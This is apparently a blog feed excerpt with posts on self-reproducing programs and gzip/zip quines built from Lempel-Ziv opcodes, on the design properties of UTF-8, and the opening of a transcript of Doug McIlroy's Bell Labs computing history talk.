But now we know what the program is, so let's print it: </p> <pre class=indent> &gt;&gt;&gt; print "<span style="color: #005500">print 'hello'</span>" print 'hello' </pre> <p class=lp> That didn't quite work either. The problem is that when you execute a simple print statement, it only prints part of itself: the argument to the print. We need a way to print the rest of the program too. </p> <p class=pp> The trick is to use recursion: you write a string that is the whole program, but with itself missing, and then you plug it into itself before passing it to print. </p> <pre class=indent> &gt;&gt;&gt; s = '<span style="color: #005500">print %s</span>'; print s % repr(s) print 'print %s' </pre> <p class=lp> Not quite, but closer: the problem is that the string <code>s</code> isn't actually the program. But now we know the general form of the program: <code>s = '<span style="color: #005500">%s</span>'; print s % repr(s)</code>. That's the string to use. </p> <pre class=indent> &gt;&gt;&gt; s = '<span style="color: #005500">s = %s; print s %% repr(s)</span>'; print s % repr(s) s = 's = %s; print s %% repr(s)'; print s % repr(s) </pre> <p class=lp> Recursion for the win. </p> <p class=pp> This form of self-reproducing program is often called a <a href="http://en.wikipedia.org/wiki/Quine_(computing)">quine</a>, in honor of the philosopher and logician W. V. O. Quine, who discovered the paradoxical sentence: </p> <blockquote> &ldquo;Yields falsehood when preceded by its quotation&rdquo;<br>yields falsehood when preceded by its quotation. </blockquote> <p class=lp> The simplest English form of a self-reproducing quine is a command like: </p> <blockquote> Print this, followed by its quotation:<br>&ldquo;Print this, followed by its quotation:&rdquo; </blockquote> <p class=lp> There's nothing particularly special about Python that makes quining possible. The most elegant quine I know is a Scheme program that is a direct, if somewhat inscrutable, translation of that sentiment: </p> <pre class=indent> ((lambda (x) `<span style="color: #005500">(</span>,x <span style="color: #005500">'</span>,x<span style="color: #005500">)</span>) '<span style="color: #005500">(lambda (x) `(,x ',x))</span>) </pre> <p class=lp> I think the Go version is a clearer translation, at least as far as the quoting is concerned: </p> <pre class=indent> /* Go quine */ package main import "<span style="color: #005500">fmt</span>" func main() { fmt.Printf("<span style="color: #005500">%s%c%s%c\n</span>", q, 0x60, q, 0x60) } var q = `<span style="color: #005500">/* Go quine */ package main import "fmt" func main() { fmt.Printf("%s%c%s%c\n", q, 0x60, q, 0x60) } var q = </span>` </pre> <p class=lp>(I've colored the data literals green throughout to make it clear what is program and what is data.)</p> <p class=pp>The Go program has the interesting property that, ignoring the pesky newline at the end, the entire program is the same thing twice (<code>/* Go quine */ ... q = `</code>). That got me thinking: maybe it's possible to write a self-reproducing program using only a repetition operator. And you know what programming language has essentially only a repetition operator? The language used to encode Lempel-Ziv compressed files like the ones used by <code>gzip</code> and <code>zip</code>. 
</p> <h3>Self-reproducing Lempel-Ziv programs</h3> <p class=pp> Lempel-Ziv compressed data is a stream of instructions with two basic opcodes: <code>literal(</code><i>n</i><code>)</code> followed by <i>n</i> bytes of data means write those <i>n</i> bytes into the decompressed output, and <code>repeat(</code><i>d</i><code>,</code> <i>n</i><code>)</code> means look backward <i>d</i> bytes from the current location in the decompressed output and copy the <i>n</i> bytes you find there into the output stream. </p> <p class=pp> The programming exercise, then, is this: write a Lempel-Ziv program using just those two opcodes that prints itself when run. In other words, write a compressed data stream that decompresses to itself. Feel free to assume any reasonable encoding for the <code>literal</code> and <code>repeat</code> opcodes. For the grand prize, find a program that decompresses to itself surrounded by an arbitrary prefix and suffix, so that the sequence could be embedded in an actual <code>gzip</code> or <code>zip</code> file, which has a fixed-format header and trailer. </p> <p class=pp> <b>Spoiler alert!</b> I urge you to try this on your own before continuing to read. It's a great way to spend a lazy afternoon, and you have one critical advantage that I didn't: you know there is a solution. </p> <center> <br><br> <i>(Spoiler blocker.)</i> <br> <a href=""><img src="http://research.swtch.com/the_best_circular_bike(sbcc_sbma_students_roof).jpg"></a> <br> <i><a href="http://www.robertwechsler.com/thebest.html">http://www.robertwechsler.com/thebest.html</a></i> <br><br> </center> <p class=lp>By the way, here's <a href="http://swtch.com/r.gz"><code>r.gz</code></a>, gzip files all the way down. <pre class=indent> $ gunzip &lt; r.gz &gt; r $ cmp r r.gz $ </pre> <p class=lp>The nice thing about <code>r.gz</code> is that even broken web browsers that ordinarily decompress downloaded gzip data before storing it to disk will handle this file correctly! </p> <p class=pp>Enough stalling to hide the spoilers. Let's use this shorthand to describe Lempel-Ziv instructions: <code>L</code><i>n</i> and <code>R</code><i>n</i> are shorthand for <code>literal(</code><i>n</i><code>)</code> and <code>repeat(</code><i>n</i><code>,</code> <i>n</i><code>)</code>, and the program assumes that each code is one byte. <code>L0</code> is therefore the Lempel-Ziv no-op; <code>L5</code> <code>hello</code> prints <code>hello</code>; and so does <code>L3</code> <code>hel</code> <code>R1</code> <code>L1</code> <code>o</code>. </p> <p class=pp> Here's a Lempel-Ziv program that prints itself. (Each line is one instruction.) 
</p> <br> <center> <table border=0> <tr><th></th><th width=30></th><th>Code</th><th width=30></th><th>Output</th></tr> <tr><td align=right><i><span style="font-size: 0.8em;">no-op</span></i></td><td></td><td><code>L0</code></td><td></td><td></td></tr> <tr><td align=right><i><span style="font-size: 0.8em;">no-op</span></i></td><td></td><td><code>L0</code></td><td></td><td></td></tr> <tr><td align=right><i><span style="font-size: 0.8em;">no-op</span></i></td><td></td><td><code>L0</code></td><td></td><td></td></tr> <tr><td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td><td></td><td><code>L4 <span style="color: #005500">L0 L0 L0 L4</span></code></td><td></td><td><code>L0 L0 L0 L4</code></td></tr> <tr><td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td><td></td><td><code>R4</code></td><td></td><td><code>L0 L0 L0 L4</code></td></tr> <tr><td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td><td></td><td><code>L4 <span style="color: #005500">R4 L4 R4 L4</span></code></td><td></td><td><code>R4 L4 R4 L4</code></td></tr> <tr><td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td><td></td><td><code>R4</code></td><td></td><td><code>R4 L4 R4 L4</code></td></tr> <tr><td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td><td></td><td><code>L4 <span style="color: #005500">L0 L0 L0 L0</span></code></td><td></td><td><code>L0 L0 L0 L0</code></td></tr> </table> </center> <br> <p class=lp> (The two columns Code and Output contain the same byte sequence.) </p> <p class=pp> The interesting core of this program is the 6-byte sequence <code>L4 R4 L4 R4 L4 R4</code>, which prints the 8-byte sequence <code>R4 L4 R4 L4 R4 L4 R4 L4</code>. That is, it prints itself with an extra byte before and after. </p> <p class=pp> When we were trying to write the self-reproducing Python program, the basic problem was that the print statement was always longer than what it printed. We solved that problem with recursion, computing the string to print by plugging it into itself. Here we took a different approach. The Lempel-Ziv program is particularly repetitive, so that a repeated substring ends up containing the entire fragment. The recursion is in the representation of the program rather than its execution. Either way, that fragment is the crucial point. Before the final <code>R4</code>, the output lags behind the input. Once it executes, the output is one code ahead. 
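</p> <p class=pp> If you want to check the table mechanically, a few lines of code suffice. Here is a short Go sketch of an interpreter for the shorthand, written for illustration rather than taken from any real decompressor; it treats each symbolic code such as <code>L4</code> or <code>R4</code> as a single &ldquo;byte,&rdquo; exactly as the table does: </p> <pre class=indent>
package main

import (
	"fmt"
	"reflect"
	"strconv"
)

// decode runs a program written in the shorthand. Each element of prog is
// one code: "Ln" copies the next n elements to the output verbatim, and
// "Rn" copies the last n output elements again.
func decode(prog []string) []string {
	var out []string
	for i := 0; i &lt; len(prog); i++ {
		n, _ := strconv.Atoi(prog[i][1:])
		switch prog[i][0] {
		case 'L':
			out = append(out, prog[i+1:i+1+n]...)
			i += n
		case 'R':
			out = append(out, out[len(out)-n:]...)
		}
	}
	return out
}

func main() {
	// The program from the table above, one code or literal byte per element.
	prog := []string{
		"L0", "L0", "L0",
		"L4", "L0", "L0", "L0", "L4",
		"R4",
		"L4", "R4", "L4", "R4", "L4",
		"R4",
		"L4", "L0", "L0", "L0", "L0",
	}
	fmt.Println(reflect.DeepEqual(decode(prog), prog)) // prints true
}
</pre> <p class=lp> The same interpreter can be used to try out the more general variants that follow.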
</p> <p class=pp> The <code>L0</code> no-ops are plugged into a more general variant of the program, which can reproduce itself with the addition of an arbitrary three-byte prefix and suffix: </p> <br> <center> <table border=0> <tr><th></th><th width=30></th><th>Code</th><th width=30></th><th>Output</th></tr> <tr><td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td><td></td><td><code>L4 <span style="color: #005500"><i>aa bb cc</i> L4</span></code></td><td></td><td><code><i>aa bb cc</i> L4</code></td></tr> <tr><td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td><td></td><td><code>R4</code></td><td></td><td><code><i>aa bb cc</i> L4</code></td></tr> <tr><td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td><td></td><td><code>L4 <span style="color: #005500">R4 L4 R4 L4</span></code></td><td></td><td><code>R4 L4 R4 L4</code></td></tr> <tr><td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td><td></td><td><code>R4</code></td><td></td><td><code>R4 L4 R4 L4</code></td></tr> <tr><td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td><td></td><td><code>L4 <span style="color: #005500">R4 <i>xx yy zz</i></span></code></td><td></td><td><code>R4 <i>xx yy zz</i></code></td></tr> <tr><td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td><td></td><td><code>R4</code></td><td></td><td><code>R4 <i>xx yy zz</i></code></td></tr> </table> </center> <br> <p class=lp> (The byte sequence in the Output column is <code><i>aa bb cc</i></code>, then the byte sequence from the Code column, then <code><i>xx yy zz</i></code>.) </p> <p class=pp> It took me the better part of a quiet Sunday to get this far, but by the time I got here I knew the game was over and that I'd won. From all that experimenting, I knew it was easy to create a program fragment that printed itself minus a few instructions or even one that printed an arbitrary prefix and then itself, minus a few instructions. The extra <code>aa bb cc</code> in the output provides a place to attach such a program fragment. Similarly, it's easy to create a fragment to attach to the <code>xx yy zz</code> that prints itself, minus the first three instructions, plus an arbitrary suffix. We can use that generality to attach an appropriate header and trailer. </p> <p class=pp> Here is the final program, which prints itself surrounded by an arbitrary prefix and suffix. <code>[P]</code> denotes the <i>p</i>-byte compressed form of the prefix <code>P</code>; similarly, <code>[S]</code> denotes the <i>s</i>-byte compressed form of the suffix <code>S</code>. 
</p> <br> <center> <table border=0> <tr><th></th><th width=30></th><th>Code</th><th width=30></th><th>Output</th></tr> <tr> <td align=right><i><span style="font-size: 0.8em;">print prefix</span></i></td> <td></td> <td><code>[P]</code></td> <td></td> <td><code>P</code></td> </tr> <tr> <td align=right><span style="font-size: 0.8em;"><i>print </i>p<i>+1 bytes</i></span></td> <td></td> <td><code>L</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code> <span style="color: #005500">[P] L</span></code><span style="color: #005500"><span style="font-size: 0.8em;"><i>p</i>+1</span></span><code></code></td> <td></td> <td><code>[P] L</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code></code></td> </tr> <tr> <td align=right><span style="font-size: 0.8em;"><i>repeat last </i>p<i>+1 printed bytes</i></span></td> <td></td> <td><code>R</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code></code></td> <td></td> <td><code>[P] L</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code></code></td> </tr> <tr> <td align=right><span style="font-size: 0.8em;"><i>print 1 byte</i></span></td> <td></td> <td><code>L1 <span style="color: #005500">R</span></code><span style="color: #005500"><span style="font-size: 0.8em;"><i>p</i>+1</span></span><code></code></td> <td></td> <td><code>R</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code></code></td> </tr> <tr> <td align=right><span style="font-size: 0.8em;"><i>print 1 byte</i></span></td> <td></td> <td><code>L1 <span style="color: #005500">L1</span></code></td> <td></td> <td><code>L1</code></td> </tr> <tr> <td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td> <td></td> <td><code>L4 <span style="color: #005500">R</span></code><span style="color: #005500"><span style="font-size: 0.8em;"><i>p</i>+1</span></span><code><span style="color: #005500"> L1 L1 L4</span></code></td> <td></td> <td><code>R</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code> L1 L1 L4</code></td> </tr> <tr> <td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td> <td></td> <td><code>R4</code></td> <td></td> <td><code>R</code><span style="font-size: 0.8em;"><i>p</i>+1</span><code> L1 L1 L4</code></td> </tr> <tr> <td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td> <td></td> <td><code>L4 <span style="color: #005500">R4 L4 R4 L4</span></code></td> <td></td> <td><code>R4 L4 R4 L4</code></td> </tr> <tr> <td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td> <td></td> <td><code>R4</code></td> <td></td> <td><code>R4 L4 R4 L4</code></td> </tr> <tr> <td align=right><i><span style="font-size: 0.8em;">print 4 bytes</span></i></td> <td></td> <td><code>L4 <span style="color: #005500">R4 L0 L0 L</span></code><span style="color: #005500"><span style="font-size: 0.8em;"><i>s</i>+1</span></span><code><span style="color: #005500"></span></code></td> <td></td> <td><code>R4 L0 L0 L</code><span style="font-size: 0.8em;"><i>s</i>+1</span><code></code></td> </tr> <tr> <td align=right><i><span style="font-size: 0.8em;">repeat last 4 printed bytes</span></i></td> <td></td> <td><code>R4</code></td> <td></td> <td><code>R4 L0 L0 L</code><span style="font-size: 0.8em;"><i>s</i>+1</span><code></code></td> </tr> <tr> <td align=right><i><span style="font-size: 0.8em;">no-op</span></i></td> <td></td> <td><code>L0</code></td> <td></td> <td></td> </tr> <tr> <td align=right><i><span style="font-size: 0.8em;">no-op</span></i></td> <td></td> 
<td><code>L0</code></td> <td></td> <td></td> </tr> <tr> <td align=right><span style="font-size: 0.8em;"><i>print </i>s<i>+1 bytes</i></span></td> <td></td> <td><code>L</code><span style="font-size: 0.8em;"><i>s</i>+1</span><code> <span style="color: #005500">R</span></code><span style="color: #005500"><span style="font-size: 0.8em;"><i>s</i>+1</span></span><code><span style="color: #005500"> [S]</span></code></td> <td></td> <td><code>R</code><span style="font-size: 0.8em;"><i>s</i>+1</span><code> [S]</code></td> </tr> <tr> <td align=right><span style="font-size: 0.8em;"><i>repeat last </i>s<i>+1 bytes</i></span></td> <td></td> <td><code>R</code><span style="font-size: 0.8em;"><i>s</i>+1</span><code></code></td> <td></td> <td><code>R</code><span style="font-size: 0.8em;"><i>s</i>+1</span><code> [S]</code></td> </tr> <tr> <td align=right><i><span style="font-size: 0.8em;">print suffix</span></i></td> <td></td> <td><code>[S]</code></td> <td></td> <td><code>S</code></td> </tr> </table> </center> <br> <p class=lp> (The byte sequence in the Output column is <code><i>P</i></code>, then the byte sequence from the Code column, then <code><i>S</i></code>.) </p> <h3>Self-reproducing zip files</h3> <p class=pp> Now the rubber meets the road. We've solved the main theoretical obstacle to making a self-reproducing zip file, but there are a couple practical obstacles still in our way. </p> <p class=pp> The first obstacle is to translate our self-reproducing Lempel-Ziv program, written in simplified opcodes, into the real opcode encoding. <a href="http://www.ietf.org/rfc/rfc1951.txt">RFC 1951</a> describes the DEFLATE format used in both gzip and zip: a sequence of blocks, each of which is a sequence of opcodes encoded using Huffman codes. Huffman codes assign different length bit strings to different opcodes, breaking our assumption above that opcodes have fixed length. But wait! We can, with some care, find a set of fixed-size encodings that says what we need to be able to express. </p> <p class=pp> In DEFLATE, there are literal blocks and opcode blocks. The header at the beginning of a literal block is 5 bytes: </p> <center> <img src="http://research.swtch.com/zip1.png"> </center> <p class=pp> If the translation of our <code>L</code> opcodes above are 5 bytes each, the translation of the <code>R</code> opcodes must also be 5 bytes each, with all the byte counts above scaled by a factor of 5. (For example, <code>L4</code> now has a 20-byte argument, and <code>R4</code> repeats the last 20 bytes of output.) The opcode block with a single <code>repeat(20,20)</code> instruction falls well short of 5 bytes: </p> <center> <img src="http://research.swtch.com/zip2.png"> </center> <p class=lp>Luckily, an opcode block containing two <code>repeat(20,10)</code> instructions has the same effect and is exactly 5 bytes: </p> <center> <img src="http://research.swtch.com/zip3.png"> </center> <p class=lp> Encoding the other sized repeats (<code>R</code><span style="font-size: 0.8em;"><i>p</i>+1</span> and <code>R</code><span style="font-size: 0.8em;"><i>s</i>+1</span>) takes more effort and some sleazy tricks, but it turns out that we can design 5-byte codes that repeat any amount from 9 to 64 bytes. 
For example, here are the repeat blocks for 10 bytes and for 40 bytes: </p> <center> <img src="http://research.swtch.com/zip4.png"> <br> <img src="http://research.swtch.com/zip5.png"> </center> <p class=lp> The repeat block for 10 bytes is two bits too short, but every repeat block is followed by a literal block, which starts with three zero bits and then padding to the next byte boundary. If a repeat block ends two bits short of a byte but is followed by a literal block, the literal block's padding will insert the extra two bits. Similarly, the repeat block for 40 bytes is five bits too long, but they're all zero bits. Starting a literal block five bits too late steals the bits from the padding. Both of these tricks only work because the last 7 bits of any repeat block are zero and the bits in the first byte of any literal block are also zero, so the boundary isn't directly visible. If the literal block started with a one bit, this sleazy trick wouldn't work. </p> <p class=pp>The second obstacle is that zip archives (and gzip files) record a CRC32 checksum of the uncompressed data. Since the uncompressed data is the zip archive, the data being checksummed includes the checksum itself. So we need to find a value <i>x</i> such that writing <i>x</i> into the checksum field causes the file to checksum to <i>x</i>. Recursion strikes back. </p> <p class=pp> The CRC32 checksum computation interprets the entire file as a big number and computes the remainder when you divide that number by a specific constant using a specific kind of division. We could go through the effort of setting up the appropriate equations and solving for <i>x</i>. But frankly, we've already solved one nasty recursive puzzle today, and <a href="http://www.youtube.com/watch?v=TQBLTB5f3j0">enough is enough</a>. There are only four billion possibilities for <i>x</i>: we can write a program to try each in turn, until it finds one that works. </p> <p class=pp> If you want to recreate these files yourself, there are a few more minor obstacles, like making sure the tar file is a multiple of 512 bytes and compressing the rather large zip trailer to at most 59 bytes so that <code>R</code><span style="font-size: 0.8em;"><i>s</i>+1</span> is at most <code>R</code><span style="font-size: 0.8em;">64</span>. But they're just a simple matter of programming. </p> <p class=pp> So there you have it: <code><a href="http://swtch.com/r.gz">r.gz</a></code> (gzip files all the way down), <code><a href="http://swtch.com/r.tar.gz">r.tar.gz</a></code> (gzipped tar files all the way down), and <code><a href="http://swtch.com/r.zip">r.zip</a></code> (zip files all the way down). I regret that I have been unable to find any programs that insist on decompressing these files recursively, ad infinitum. It would have been fun to watch them squirm, but it looks like much less sophisticated <a href="http://en.wikipedia.org/wiki/Zip_bomb">zip bombs</a> have spoiled the fun. </p> <p class=pp> If you're feeling particularly ambitious, here is <a href="http://swtch.com/rgzip.go">rgzip.go</a>, the <a href="http://golang.org/">Go</a> program that generated these files. I wonder if you can create a zip file that contains a gzipped tar file that contains the original zip file. Ken Thompson suggested trying to make a zip file that contains a slightly larger copy of itself, recursively, so that as you dive down the chain of zip files each one gets a little bigger. (If you do manage either of these, please leave a comment.) </p> <br> <p class=lp><font size=-1>P.S. 
I can't end the post without sharing my favorite self-reproducing program: the one-line shell script <code>#!/bin/cat</code></font>. </p></p> </div> </div> </div> UTF-8: Bits, Bytes, and Benefits tag:research.swtch.com,2012:research.swtch.com/utf8 2010-03-05T00:00:00-05:00 2010-03-05T00:00:00-05:00 The reasons to switch to UTF-8 <p><p class=pp> UTF-8 is a way to encode Unicode code points&#8212;integer values from 0 through 10FFFF&#8212;into a byte stream, and it is far simpler than many people realize. The easiest way to make it confusing or complicated is to treat it as a black box, never looking inside. So let's start by looking inside. Here it is: </p> <center> <table cellspacing=5 cellpadding=0 border=0> <tr height=10><th colspan=4></th></tr> <tr><th align=center colspan=2>Unicode code points</th><th width=10><th align=center>UTF-8 encoding (binary)</th></tr> <tr height=10><td colspan=4></td></tr> <tr><td align=right>00-7F</td><td>(7 bits)</td><td></td><td align=right>0<i>tuvwxyz</i></td></tr> <tr><td align=right>0080-07FF</td><td>(11 bits)</td><td></td><td align=right>110<i>pqrst</i>&nbsp;10<i>uvwxyz</i></td></tr> <tr><td align=right>0800-FFFF</td><td>(16 bits)</td><td></td><td align=right>1110<i>jklm</i>&nbsp;10<i>npqrst</i>&nbsp;10<i>uvwxyz</i></td></tr> <tr><td align=right valign=top>010000-10FFFF</td><td>(21 bits)</td><td></td><td align=right valign=top>11110<i>efg</i>&nbsp;10<i>hijklm</i> 10<i>npqrst</i>&nbsp;10<i>uvwxyz</i></td> <tr height=10><td colspan=4></td></tr> </table> </center> <p class=lp> The convenient properties of UTF-8 are all consequences of the choice of encoding. </p> <ol> <li><i>All ASCII files are already UTF-8 files.</i><br> The first 128 Unicode code points are the 7-bit ASCII character set, and UTF-8 preserves their one-byte encoding. </li> <li><i>ASCII bytes always represent themselves in UTF-8 files. They never appear as part of other UTF-8 sequences.</i><br> All the non-ASCII UTF-8 sequences consist of bytes with the high bit set, so if you see the byte 0x7A in a UTF-8 file, you can be sure it represents the character <code>z</code>. </li> <li><i>ASCII bytes are always represented as themselves in UTF-8 files. They cannot be hidden inside multibyte UTF-8 sequences.</i><br> The ASCII <code>z</code> 01111010 cannot be encoded as a two-byte UTF-8 sequence 11000001 10111010</code>. Code points must be encoded using the shortest possible sequence. A corollary is that decoders must detect long-winded sequences as invalid. In practice, it is useful for a decoder to use the Unicode replacement character, code point FFFD, as the decoding of an invalid UTF-8 sequence rather than stop processing the text. </li> <li><i>UTF-8 is self-synchronizing.</i><br> Let's call a byte of the form 10<i>xxxxxx</i> a continuation byte. Every UTF-8 sequence is a byte that is not a continuation byte followed by zero or more continuation bytes. If you start processing a UTF-8 file at an arbitrary point, you might not be at the beginning of a UTF-8 encoding, but you can easily find one: skip over continuation bytes until you find a non-continuation byte. (The same applies to scanning backward.) </li> <li><i>Substring search is just byte string search.</i><br> Properties 2, 3, and 4 imply that given a string of correctly encoded UTF-8, the only way those bytes can appear in a larger UTF-8 text is when they represent the same code points. So you can use any 8-bit safe byte at a time search function, like <code>strchr</code> or <code>strstr</code>, to run the search. 
</li> <li><i>Most programs that handle 8-bit files safely can handle UTF-8 safely.</i><br> This also follows from Properties 2, 3, and 4. I say &ldquo;most&rdquo; programs, because programs that take apart a byte sequence expecting one character per byte will not behave correctly, but very few programs do that. It is far more common to split input at newline characters, or split whitespace-separated fields, or do other similar parsing around specific ASCII characters. For example, Unix tools like cat, cmp, cp, diff, echo, head, tail, and tee can process UTF-8 files as if they were plain ASCII files. Most operating system kernels should also be able to handle UTF-8 file names without any special arrangement, since the only operations done on file names are comparisons and splitting at <code>/</code>. In contrast, tools like grep, sed, and wc, which inspect arbitrary individual characters, do need modification. </li> <li><i>UTF-8 sequences sort in code point order.</i><br> You can verify this by inspecting the encodings in the table above. This means that Unix tools like join, ls, and sort (without options) don't need to handle UTF-8 specially. </li> <li><i>UTF-8 has no &ldquo;byte order.&rdquo;</i><br> UTF-8 is a byte encoding. It is not little endian or big endian. Unicode defines a byte order mark (BOM) code point FEFF, which can be used to determine the byte order of a stream of raw 16-bit values, like UCS-2 or UTF-16. It has no place in a UTF-8 file. Some programs like to write a UTF-8-encoded BOM at the beginning of UTF-8 files, but this is unnecessary (and annoying to programs that don't expect it). </li> </ol> <p class=lp> UTF-8 does give up the ability to do random access using code point indices. Programs that need to jump to the <i>n</i>th Unicode code point in a file or on a line&#8212;text editors are the canonical example&#8212;will typically convert incoming UTF-8 to an internal representation like an array of code points and then convert back to UTF-8 for output, but most programs are simpler when written to manipulate UTF-8 directly. </p> <p class=pp> Programs that make UTF-8 more complicated than it needs to be are typically trying to be too general, not wanting to make assumptions that might not be true of other encodings. But there are good tools to convert other encodings to UTF-8, and it is slowly becoming the standard encoding: even the fraction of web pages written in UTF-8 is <a href="http://googleblog.blogspot.com/2010/01/unicode-nearing-50-of-web.html">nearing 50%</a>. UTF-8 was explicitly designed to have these nice properties. Take advantage of them. </p> <p class=pp> For more on UTF-8, see &ldquo;<a href="https://9p.io/sys/doc/utf.html">Hello World or Καλημέρα κόσμε or こんにちは 世界</a>,&rdquo; by Rob Pike and Ken Thompson, and also this <a href="http://www.cl.cam.ac.uk/~mgk25/ucs/utf-8-history.txt">history</a>. </p> <br> <font size=-1> <p class=lp> Notes: Property 6 assumes the tools do not strip the high bit from each byte. Such mangling was common years ago but is very uncommon now. Property 7 assumes the comparison is done treating the bytes as unsigned, but such behavior is mandated by the ANSI C standard for <code>memcmp</code>, <code>strcmp</code>, and <code>strncmp</code>.
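</p> <p class=lp> As a final note, the encoding table at the top of this post translates almost directly into code. The following Go sketch is for illustration only; a production encoder, such as the one in Go's <code>unicode/utf8</code> package, also rejects surrogates and out-of-range code points: </p> <pre class=indent>
package main

import "fmt"

// encode returns the UTF-8 encoding of the code point r, following the bit
// patterns in the table: the leading byte carries the high-order payload
// bits, and each continuation byte carries six more.
func encode(r rune) []byte {
	switch {
	case r &lt; 0x80: // 0tuvwxyz
		return []byte{byte(r)}
	case r &lt; 0x800: // 110pqrst 10uvwxyz
		return []byte{0xC0 | byte(r&gt;&gt;6), 0x80 | byte(r)&amp;0x3F}
	case r &lt; 0x10000: // 1110jklm 10npqrst 10uvwxyz
		return []byte{0xE0 | byte(r&gt;&gt;12), 0x80 | byte(r&gt;&gt;6)&amp;0x3F, 0x80 | byte(r)&amp;0x3F}
	default: // 11110efg 10hijklm 10npqrst 10uvwxyz
		return []byte{0xF0 | byte(r&gt;&gt;18), 0x80 | byte(r&gt;&gt;12)&amp;0x3F, 0x80 | byte(r&gt;&gt;6)&amp;0x3F, 0x80 | byte(r)&amp;0x3F}
	}
}

func main() {
	for _, r := range []rune{'z', 'λ', '世', 0x10348} {
		fmt.Printf("U+%04X: % X\n", r, encode(r))
	}
}
</pre> <p class=lp> Decoding runs the table in reverse: the leading byte tells how many continuation bytes follow, and the payload bits are reassembled in the same order.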
</p> </font></p> Computing History at Bell Labs tag:research.swtch.com,2012:research.swtch.com/bell-labs 2008-04-09T00:00:00-04:00 2008-04-09T00:00:00-04:00 Doug McIlroy’s remembrances <p><p class=pp> In 1997, on his retirement from Bell Labs, <a href="http://www.cs.dartmouth.edu/~doug/">Doug McIlroy</a> gave a fascinating talk about the &ldquo;<a href="https://web.archive.org/web/20081022192943/http://cm.bell-labs.com/cm/cs/doug97.html"><b>History of Computing at Bell Labs</b></a>.&rdquo; Almost ten years ago I transcribed the audio but never did anything with it. The transcript is below. </p> <p class=pp> My favorite parts of the talk are the description of the bi-quinary decimal relay calculator and the description of a team that spent over a year tracking down a race condition bug in a missile detector (reliability was king: today you’d just stamp &ldquo;cannot reproduce&rdquo; and send the report back). But the whole thing contains many fantastic stories. It’s well worth the read or listen. I also like his recollection of programming using cards: &ldquo;It’s the kind of thing you can be nostalgic about, but it wasn’t actually fun.&rdquo; </p> <p class=pp> For more information, Bernard D. Holbrook and W. Stanley Brown’s 1982 technical report &ldquo;<a href="cstr99.pdf">A History of Computing Research at Bell Laboratories (1937-1975)</a>&rdquo; covers the earlier history in more detail. </p> <p><i>Corrections added August 19, 2009. Links updated May 16, 2018.</i></p> <p><i>Update, December 19, 2020.</i> The original audio files disappeared along with the rest of the Bell Labs site some time ago, but I discovered a saved copy on one of my computers: [<a href="mcilroy97history.mp3">MP3</a> | <a href="mcilroy97history.rm">original RealAudio</a>]. I also added a few corrections and notes from Doug McIlroy, dated 2015 [sic].</p> <br> <br> <p class=lp><b>Transcript</b></p> <p class=pp> Computing at Bell Labs is certainly an outgrowth of the <a href="https://web.archive.org/web/20080622172015/http://cm.bell-labs.com/cm/ms/history/history.html">mathematics department</a>, which grew from that first hiring in 1897, G A Campbell. When Bell Labs was formally founded in 1925, what it had been was the engineering department of Western Electric. When it was formally founded in 1925, almost from the beginning there was a math department with Thornton Fry as the department head, and if you look at some of Fry’s work, it turns out that he was fussing around in 1929 with trying to discover information theory. It didn’t actually gel until twenty years later with Shannon.</p> <p class=pp><span style="font-size: 0.7em;">1:10</span> Of course, most of the mathematics at that time was continuous. One was interested in analyzing circuits and propagation. And indeed, this is what led to the growth of computing in Bell Laboratories. The computations could not all be done symbolically. There were not closed form solutions. There was lots of numerical computation done. The math department had a fair stable of computers, which in those days meant people. [laughter]</p> <p class=pp><span style="font-size: 0.7em;">2:00</span> And in the late ’30s, <a href="http://en.wikipedia.org/wiki/George_Stibitz">George Stibitz</a> had an idea that some of the work that they were doing on hand calculators might be automated by using some of the equipment that the Bell System was installing in central offices, namely relay circuits. He went home, and on his kitchen table, he built out of relays a binary arithmetic circuit.
He decided that binary was really the right way to compute. However, when he finally came to build some equipment, he determined that binary to decimal conversion and decimal to binary conversion was a drag, and he didn’t want to put it in the equipment, and so he finally built in 1939, a relay calculator that worked in decimal, and it worked in complex arithmetic. Do you have a hand calculator now that does complex arithmetic? Ten-digit, I believe, complex computations: add, subtract, multiply, and divide. The I/O equipment was teletypes, so essentially all the stuff to make such machines out of was there. Since the I/O was teletypes, it could be remotely accessed, and there were in fact four stations in the West Street Laboratories of Bell Labs. West Street is down on the left side of Manhattan. I had the good fortune to work there one summer, right next to a district where you’re likely to get bowled over by rolling beeves hanging from racks or tumbling cabbages. The building is still there. It’s called <a href="http://query.nytimes.com/gst/fullpage.html?res=950DE3DB1F38F931A35751C0A96F948260">Westbeth Apartments</a>. It’s now an artist’s colony.</p> <p class=pp><span style="font-size: 0.7em;">4:29</span> Anyway, in West Street, there were four separate remote stations from which the complex calculator could be accessed. It was not time sharing. You actually reserved your time on the machine, and only one of the four terminals worked at a time. In 1940, this machine was shown off to the world at the AMS annual convention, which happened to be held in Hanover at Dartmouth that year, and mathematicians could wonder at remote computing, doing computation on an electromechanical calculator at 300 miles away.</p> <p class=pp><span style="font-size: 0.7em;">5:22</span> Stibitz went on from there to make a whole series of relay machines. Many of them were made for the government during the war. They were named, imaginatively, Mark I through Mark VI. I have read some of his patents. They’re kind of fun. One is a patent on conditional transfer. [laughter] And how do you do a conditional transfer? Well these gadgets were, the relay calculator was run from your fingers, I mean the complex calculator. The later calculators, of course, if your fingers were a teletype, you could perfectly well feed a paper tape in, because that was standard practice. And these later machines were intended really to 